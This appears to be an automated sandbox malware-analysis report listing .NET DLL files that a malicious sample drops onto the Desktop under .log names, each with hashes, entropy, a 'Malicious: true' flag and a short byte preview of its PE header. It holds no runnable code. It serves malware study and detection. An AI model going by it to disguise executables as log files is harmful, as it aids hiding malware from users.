Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bmXzZwPf.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\btCRzSEF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bwSQzEwi.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\byyKGwGy.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bzhjaotg.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cBFZJSYc.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cJprnBzi.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cttYUELd.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dTEysZYC.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\drzBFnSx.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eAktcfLt.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eQfHOZnx.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\edcYVUJp.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\elMqzDku.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fGerwGnb.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fMYqQhPK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fuVIuOJa.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\gZGZiBsl.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gsThGkmc.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\hJupzWZv.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hcChGAko.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hkwSIGWM.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hlfqcyJu.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
